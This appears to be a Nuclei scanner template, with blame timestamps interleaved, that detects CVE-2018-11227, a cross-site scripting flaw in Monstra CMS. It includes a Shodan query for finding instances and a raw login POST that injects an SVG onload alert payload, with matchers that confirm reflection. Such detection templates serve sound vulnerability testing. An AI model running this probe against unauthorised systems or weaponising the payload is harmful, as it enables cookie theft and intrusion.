2023-01-09 06:03:27 +00:00
id : CVE-2018-11227
info :
2023-01-30 19:24:22 +00:00
name : Monstra CMS <=3.0.4 - Cross-Site Scripting
2023-01-09 06:03:27 +00:00
author : ritikchaddha
severity : medium
description : |
2023-01-30 19:24:22 +00:00
Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-01-09 06:03:27 +00:00
reference :
- https://github.com/monstra-cms/monstra/issues/438
2023-01-10 10:56:28 +00:00
- https://www.exploit-db.com/exploits/44646
2023-01-30 19:24:22 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-11227
2023-01-09 06:03:27 +00:00
classification :
2023-01-10 10:56:28 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2023-01-09 06:03:27 +00:00
cve-id : CVE-2018-11227
2023-01-10 10:56:28 +00:00
cwe-id : CWE-79
2023-01-09 06:03:27 +00:00
metadata :
2023-01-10 09:42:55 +00:00
shodan-query : http.favicon.hash:419828698
2023-01-10 10:56:28 +00:00
verified : "true"
2023-01-10 11:49:16 +00:00
tags : cve,cve2018,xss,mostra,mostracms,cms,edb
2023-01-09 06:03:27 +00:00
requests :
- raw :
- |
POST /admin/index.php?id=pages HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
login="><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In
matchers-condition : and
matchers :
- type : word
part : body
words :
- "><svg/onload=alert(document.domain)>"
- "Monstra"
condition : and
case-insensitive : true
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200
2023-01-30 19:24:22 +00:00
# Enhanced by md on 2023/01/30